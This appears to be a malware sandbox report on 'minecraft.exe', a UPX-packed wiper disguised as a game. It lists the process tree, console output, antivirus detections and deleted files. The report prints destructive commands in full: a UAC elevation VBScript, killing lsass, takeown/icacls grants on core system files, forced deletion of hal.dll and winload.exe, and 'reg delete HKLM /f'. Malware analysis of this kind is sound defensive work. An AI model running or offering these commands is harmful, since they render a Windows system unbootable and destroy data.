Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 31, 2024, 5:50 p.m.	Oct. 31, 2024, 5:52 p.m.

Size	55.5KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`09718d571b01cb93e6f983be7b99a4b2`
SHA256	`6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169`
CRC32	`BAD55F4A`
ssdeep	`1536:34dJooh0Wa0aer344Jw/ytUqVS5EkIijQ1fTNiPJ:34dzVTaer344JzthRZijQ1Ji`
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description) UPX_Zero - UPX packed file

minecraft.exe "C:\Users\test22\AppData\Local\Temp\minecraft.exe"
1700
- cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"
  2120
  - fsutil.exe fsutil dirty query C:
    2220
  - taskkill.exe taskkill /f /im taskmgr.exe
    2264
  - taskkill.exe taskkill /f /im regedit.exe
    2368
  - takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
    2452
  - icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
    2528
  - takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
    2724
  - icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
    2776
  - takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
    2972
  - icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
    3016
  - takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
    2164
  - icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
    2252
  - takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
    2316
  - icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
    2432
  - takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
    2524
  - icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
    2608
  - takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
    1676
  - icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
    316
  - takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
    416
  - icacls.exe icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
    3000
  - takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
    2096
  - icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
    2292
  - takeown.exe takeown /f C:\Windows\System32\drivers /r /d y
    2500
  - icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
    2548
  - takeown.exe takeown /f C:\Windows\System32\shutdown.exe /r /d y
    2012
  - icacls.exe icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
    1896
  - taskkill.exe taskkill /f /im lsass.exe
    1668

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (14 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 31, 2024, 5:51 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (50 out of 1146 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\C0DA.tmp> console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: set console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: "params=C:\Users\test22\AppData\Local\Temp\minecraft.exe" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\C0DA.tmp> console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: cd console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /d "C:\Users\test22\AppData\Local\Temp\" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: if console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: exist "C:\Users\test22\AppData\Local\Temp\getadmin.vbs" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: fsutil console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: dirty query C: console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: nul console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: nul console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: echo console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: Set UAC = CreateObject("Shell.Application") : UAC.ShellExecute "cmd.exe", "/k cd ""C:\Users\test22\AppData\Local\Temp\"" && ""C:\Users\test22\AppData\Local\Temp\MINECR~1.EXE"" C:\Users\test22\AppData\Local\Temp\minecraft.exe", "", "runas", 1 console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: "C:\Users\test22\AppData\Local\Temp\getadmin.vbs" console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: exit console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /B console_handle: 0x0000000000000007	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: cd console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32 console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: taskkill console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f /im taskmgr.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: taskkill console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f /im regedit.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: takeown console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f C:\Windows\System32\hal.dll /r /d y console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: icacls console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32\hal.dll /grant everyone:F /t console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: del console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f /s /q C:\Windows\System32\hal.dll console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32\hal.dll console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: Access is denied. console_handle: 0x000000000000000f	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: takeown console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f C:\Windows\System32\winload.exe /r /d y console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: icacls console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32\winload.exe /grant everyone:F /t console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32> console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: del console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: /f /s /q C:\Windows\System32\winload.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW Oct. 31, 2024, 5:43 p.m.	buffer: C:\Windows\System32\winload.exe console_handle: 0x000000000000000b	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 31, 2024, 5:43 p.m.		1	1	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat

Creates a suspicious process (1 event)

cmdline

"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"

Executes one or more WMI queries (3 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "regedit.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "lsass.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "taskmgr.exe")

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000d400', u'virtual_address': u'0x00018000', u'entropy': 7.984045486047316, u'name': u'UPX1', u'virtual_size': u'0x0000e000'}

entropy

7.98404548605

description

A section with a high entropy has been found

entropy

0.963636363636

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 31, 2024, 5:43 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 31, 2024, 5:43 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 31, 2024, 5:51 p.m.	system_name: privilege_name: SeTakeOwnershipPrivilege	1	1
LookupPrivilegeValueW Oct. 31, 2024, 5:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Oct. 31, 2024, 5:51 p.m.	status_code: 0x00000001 process_identifier: 452 process_handle: 0x0000000000000178		0	0
NtTerminateProcess Oct. 31, 2024, 5:51 p.m.	status_code: 0x00000001 process_identifier: 452 process_handle: 0x0000000000000178	1	0	0

The executable is compressed using UPX (2 events)

section	UPX0				description	Section name indicates UPX
section	UPX1				description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	taskkill /f /im regedit.exe
cmdline	taskkill /f /im lsass.exe
cmdline	icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
cmdline	fsutil dirty query C:
cmdline	taskkill /f /im taskmgr.exe
cmdline	takeown /f C:\Windows\System32\shutdown.exe /r /d y
cmdline	reg delete HKLM /f
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"

Deletes executed files from disk (1 event)

file	C:\Windows\System32\taskmgr.exe

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 481 events)

file	C:\Windows\System32\drivers\ko-KR\vwifibus.sys.mui
file	C:\Windows\System32\drivers\amdk8.sys
file	C:\Windows\System32\drivers\asyncmac.sys
file	C:\Windows\System32\drivers\ko-KR\intelppm.sys.mui
file	C:\Windows\System32\drivers\en-US\pcmcia.sys.mui
file	C:\Windows\System32\drivers\en-US\partmgr.sys.mui
file	C:\Windows\System32\drivers\filetrace.sys
file	C:\Windows\System32\drivers\ndisuio.sys
file	C:\Windows\System32\drivers\WUDFRd.sys
file	C:\Windows\System32\drivers\monitor.sys
file	C:\Windows\System32\drivers\WUDFPf.sys
file	C:\Windows\System32\drivers\ko-KR\http.sys.mui
file	C:\Windows\System32\drivers\ko-KR\mountmgr.sys.mui
file	C:\Windows\System32\drivers\portcls.sys
file	C:\Windows\System32\drivers\wfplwf.sys
file	C:\Windows\System32\drivers\blbdrive.sys
file	C:\Windows\System32\drivers\ko-KR\fvevol.sys.mui
file	C:\Windows\System32\drivers\netbios.sys
file	C:\Windows\System32\drivers\mstee.sys
file	C:\Windows\System32\drivers\npfs.sys
file	C:\Windows\System32\drivers\hidir.sys
file	C:\Windows\System32\drivers\ko-KR\usbhub.sys.mui
file	C:\Windows\System32\drivers\en-US\mssmbios.sys.mui
file	C:\Windows\System32\drivers\RNDISMP.sys
file	C:\Windows\System32\drivers\en-US\serial.sys.mui
file	C:\Windows\System32\drivers\rasl2tp.sys
file	C:\Windows\System32\drivers\srvnet.sys
file	C:\Windows\System32\drivers\en-US\bthenum.sys.mui
file	C:\Windows\System32\drivers\ko-KR\bthenum.sys.mui
file	C:\Windows\System32\drivers\ks.sys
file	C:\Windows\System32\drivers\ko-KR\cdrom.sys.mui
file	C:\Windows\System32\drivers\ipnat.sys
file	C:\Windows\System32\drivers\en-US\BTHUSB.SYS.mui
file	C:\Windows\System32\drivers\en-US\serscan.sys.mui
file	C:\Windows\System32\drivers\etc\networks
file	C:\Windows\System32\drivers\flpydisk.sys
file	C:\Windows\System32\drivers\lsi_sas2.sys
file	C:\Windows\System32\drivers\mrxdav.sys
file	C:\Windows\System32\drivers\ko-KR\wacompen.sys.mui
file	C:\Windows\System32\drivers\FWPKCLNT.SYS
file	C:\Windows\System32\drivers\en-US\1394ohci.sys.mui
file	C:\Windows\System32\drivers\rdyboost.sys
file	C:\Windows\System32\drivers\wacompen.sys
file	C:\Windows\System32\drivers\circlass.sys
file	C:\Windows\System32\drivers\netio.sys
file	C:\Windows\System32\drivers\ko-KR\ndisuio.sys.mui
file	C:\Windows\System32\drivers\ko-KR\BrSerId.sys.mui
file	C:\Windows\System32\drivers\CompositeBus.sys
file	C:\Windows\System32\drivers\fdc.sys
file	C:\Windows\System32\drivers\ko-KR\Dot4usb.sys.mui

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1700 resumed a thread in remote process 2120
NtResumeThread Oct. 31, 2024, 5:43 p.m.	thread_handle: 0x00000000000001f8 suspend_count: 1 process_identifier: 2120	1	0	0

Uses suspicious command line tools or Windows utilities (11 events)

cmdline	icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\drivers /grant everyone:F /t
cmdline	icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\winload.exe /grant everyone:F /t
cmdline	icacls C:\Windows\System32\hal.dll /grant everyone:F /t
cmdline	icacls C:\Windows\System32\consent.exe /grant everyone:F /t

File has been identified by 42 AntiVirus engines on VirusTotal as malicious (42 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
tehtris	Generic.Malware
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win64.Generic.qc
ALYac	Trojan.GenericKD.74521350
Cylance	Unsafe
CrowdStrike	win/malicious_confidence_70% (D)
BitDefender	Trojan.GenericKD.74520337
Arcabit	Trojan.Generic.D4711711
VirIT	Trojan.Win64.Agent.CHMP
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (moderate confidence)
APEX	Malicious
Avast	Win64:Evo-gen [Trj]
MicroWorld-eScan	Trojan.GenericKD.74520337
Emsisoft	Trojan.GenericKD.74520337 (B)
DrWeb	Trojan.KillProc2.23824
McAfeeD	Real Protect-LS!09718D571B01
CTX	exe.trojan.generic
Sophos	Mal/Generic-S
Ikarus	Trojan.PowerShell.Crypt
FireEye	Generic.mg.09718d571b01cb93
Jiangmin	Trojan.Alien.ga
Google	Detected
Antiy-AVL	Trojan/Win32.Phonzy
Kingsoft	malware.kb.b.986
Gridinsoft	Trojan.Win64.Agent.sa
Xcitium	Malware@#36w60dwm4dpfh
Microsoft	Trojan:Win32/Bankinc
GData	Trojan.GenericKD.74520337
Varist	W64/Agent.CAU.gen!Eldorado
AhnLab-V3	Malware/Win.Generic.R426832
McAfee	Artemis!09718D571B01
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware.AI.DDS
Panda	Trj/Chgt.AD
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W64/Agent.4987!tr
AVG	Win64:Evo-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan:Win/Bankinc.Gen

minecraft.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All